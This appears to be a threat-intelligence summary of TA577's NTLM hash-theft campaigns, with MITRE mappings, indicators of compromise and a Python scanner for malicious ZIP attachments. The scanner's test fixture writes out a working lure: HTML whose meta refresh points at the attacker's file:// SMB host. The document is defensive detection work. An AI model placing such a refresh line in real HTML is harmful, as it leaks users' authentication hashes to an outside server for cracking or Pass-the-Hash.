Two sentences: Proofpoint details TA577’s use of a novel attack chain to steal NTLM authentication data (NTLM hashes) for information gathering and potential lateral movement, demonstrated through two February 2024 campaigns. The campaigns relied on thread hijacking with zipped HTML attachments to trigger contact with external SMB resources. #TA577 #Pikabot
Keypoints
- TA577 employed a new attack chain with the objective of stealing NTLM authentication information (NTLM hashes).
- Two campaigns on 26–27 February 2024 delivered tens of thousands of messages to many organizations via thread hijacking with zipped HTML attachments.
- The HTML in the ZIPs triggers a system connection to an SMB server (external resource owned by the threat actor) via a file:// URI.
- Evidence includes artifacts suggesting use of the Impacket toolkit and a default NTLM server challenge, indicating a specific toolchain and configuration.
- Stolen NTLM hashes could enable password cracking or Pass-The-Hash attacks to move laterally within compromised networks.
- TA577 is an initial access broker linked to follow-on ransomware (e.g., Black Basta) and is associated with Pikabot as a payload; defenders are urged to block outbound SMB.
MITRE Techniques
- [T1566.001] Phishing: Attachment – Thread hijacking with zipped HTML attachments used to lure recipients. “Messages appeared as replies to previous emails, known as thread hijacking, and contained zipped HTML attachments.”
- [T1021.002] SMB/Windows Admin Shares – The HTML file carries a meta refresh to a file:// URI ending in .txt, so opening it makes the system attempt an SMB connection to the threat actor's external server. “When opened, the HTML file triggered a system connection attempt to a Server Message Block (SMB) server via a meta refresh to a file scheme URI ending in .txt. That is, the file would automatically contact an external SMB resource owned by the threat actor.”
- [T1550.002] Pass the Hash – Captured hashes could be cracked offline or reused in Pass-The-Hash attacks for lateral movement. “These hashes could be exploited for password cracking or facilitate ‘Pass-The-Hash’ attacks using other vulnerabilities within the targeted organization to move laterally within an impacted environment.”
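The delivery mechanism above (a zipped HTML file whose meta refresh points at a file:// URI on an external host) can be caught at the mail gateway before anyone opens the attachment. The following detector is an added example written for this summary, not code from Proofpoint or from the report; it builds a constructed ZIP in memory using the file:// target the report lists as an indicator, parses each HTML member for meta refresh tags, and flags any file:// target whose host is a public address. The function names and the "invoice.html" member name are assumptions made for the example.

```python
import io
import ipaddress
import re
import zipfile
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample attachment: the meta refresh target reuses the file:// URI
# given in the report's indicators so the scanner can be exercised offline.
SAMPLE_HTML = b"""<html><head>
<meta http-equiv="refresh" content="0; url=file://89.117.1.161/mtdi/ZQCw.txt">
</head><body>Loading document...</body></html>"""

# Constructed benign sample: a meta refresh to an ordinary https:// URL.
BENIGN_HTML = b"""<html><head>
<meta http-equiv="refresh" content="0; url=https://example.com/portal">
</head><body></body></html>"""


def build_sample_zip(html: bytes, name: str = "invoice.html") -> bytes:
    """Build an in-memory ZIP holding one HTML member (test input only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(name, html)
    return buf.getvalue()


class MetaRefreshParser(HTMLParser):
    """Collect the url= target of every <meta http-equiv="refresh"> tag."""

    def __init__(self):
        super().__init__()
        self.targets = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "meta":
            return
        attr = {k.lower(): (v or "") for k, v in attrs}
        if attr.get("http-equiv", "").lower() != "refresh":
            return
        # content looks like "0; url=<target>"; tolerate optional quotes/spaces
        m = re.search(r"url\s*=\s*['\"]?([^'\"]+)", attr.get("content", ""), re.I)
        if m:
            self.targets.append(m.group(1).strip())


def is_external_host(host: str) -> bool:
    """True when the host is a routable public IP or a non-local hostname."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # Hostname rather than IP: treat anything with a dot that is not
        # a .local name as potentially external (conservative choice).
        return "." in host and not host.lower().endswith(".local")
    return not (ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved)


def scan_zip_attachment(zip_bytes: bytes) -> list:
    """Return one finding per HTML member whose meta refresh points at file://<host>/...

    Each finding records the member name, the raw target, the host it would
    contact and whether that host is external (the case that leaks NTLM data
    to an attacker-controlled SMB server).
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith((".htm", ".html")):
                continue
            parser = MetaRefreshParser()
            parser.feed(zf.read(info).decode("utf-8", errors="replace"))
            for target in parser.targets:
                u = urlparse(target)
                # A file:// URI with a non-empty authority is a UNC-style path;
                # a local file:///C:/... path has no host and is not flagged here.
                if u.scheme.lower() == "file" and u.netloc:
                    findings.append({
                        "member": info.filename,
                        "target": target,
                        "host": u.hostname,
                        "external": is_external_host(u.hostname or ""),
                    })
    return findings


if __name__ == "__main__":
    for f in scan_zip_attachment(build_sample_zip(SAMPLE_HTML)):
        print(f)
```

Any hit with "external": True is a strong reason to quarantine the message; a file:// target pointing at an internal host still deserves review, since a meta refresh to a UNC path has no legitimate place in an emailed HTML file. Pairing this with the report's advice to block outbound TCP 445 at the perimeter covers both the attachment and the network leg of the chain.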
Indicators of Compromise
- [IP] External server access targets – 89.117.1.161, 89.117.2.33
- [URL] File Scheme Redirect Targets – file://89[.]117[.]1[.]161/mtdi/ZQCw[.]txt, file://89[.]117[.]2[.]33/hvwsuw/udrh[.]txt
- [File] ZIP attachment hashes – ZIP file hashes (unique per ZIP); 2 more hashes
Read more: https://www.proofpoint.com/us/blog/threat-insight/ta577s-unusual-attack-chain-leads-ntlm-data-theft